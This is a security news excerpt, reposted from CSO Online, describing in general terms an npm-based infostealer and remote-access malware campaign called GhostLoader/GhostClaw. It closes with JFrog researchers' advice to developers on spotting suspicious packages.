From password theft to persistence: The second stage malware, internally referred to as “GhostLoader,” is a large JavaScript bundle implementing both an infostealer and a remote access framework. Once launched, GhostLoader installs itself into a hidden directory disguised as an npm telemetry service and sets up persistence mechanisms which include shell configuration hooks that automatically relaunch the malware if it stops running.Parallelly, the malware begins harvesting sensitive data across the system. According to the researchers, the payload targets browser credentials, saved cookies, SSH keys, cryptocurrency wallets, Apple Keychain data, and personal application data such as iMessage history and email records.The malware also has a RAT component that enables remote operators to route traffic through the infected machine using a SOCKS5 proxy and even clone active browser sessions, allowing attackers to impersonate users in real time.The campaign includes several anti-forensics techniques designed to evade detection and analysis. The GhostClaw payload hides its behavior through heavy obfuscation and staged execution, decrypting key components only at runtime and removing temporary artifacts generated during the installation process.JFrog researchers noted that the campaign marks another abuse of npm’s ability to execute installation scripts. They advised developers to treat npm packages that request system credentials, execute postinstall scripts, or download external payloads during installation as suspicious, and recommended installing developer tools only from verified or official sources.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4142922/devs-looking-for-openclaw-get-served-a-ghostclaw-rat.html
